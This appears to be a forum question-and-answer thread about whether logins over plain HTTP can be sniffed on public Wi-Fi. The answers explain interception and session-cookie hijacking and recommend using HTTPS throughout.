Logins with only HTTP - are they as insecure as I'm thinking?

Recently I was thinking about how websites like gmail and amazon use HTTPS during the login process when accessing your account. This makes sense, obviously, since you're typing in your account username and password and you would want that to be secure. However, on Facebook, among countless other websites, their logins are done with simple HTTP. Doesn't that mean that my login name and password are completely unencrypted? Which, even worse, means that all those people who login to their facebooks (or similar sites) at a wifi hotspot in public are susceptible to anyone getting their credentials using a simple packet sniffer (or something similar)? Is it really that easy? Or am I misunderstanding internet security?

I'm a software engineer working on some web related stuff, and although at the current time I'm not too involved with the security aspect of our software, I knew I should probably know the answer to this question, since it's extremely fundamental to website security.

Thanks!


Yes. Anything done over open WiFi using HTTP is completely open to interception, replay, etc.

That said, sites that use HTTPS to negotiate login yet exchange the resulting authentication cookie over HTTP are very open to session hijacking as well, as the developer of firesheep showed.

If you want decent security, do everything under cover of HTTPS. Servers are now fast enough and SSL certificates cheap enough (if you shop around) that this is practical; there's no longer any excuse for web developers so endangering their users.


If you really log in to a site with plain HTTP it's completely insecure, yes and anyone in a public WLAN could sniff your data. This is why i.e. Facebook does the actual login via HTTPS (look into the source code of the Facebook start page and you will see it) and then continue without encryption in order to save on computing power. This at least protects your password, but still allow all kind of other attacks, like Session Hijacking (they sniff your session cookie and use it themselves).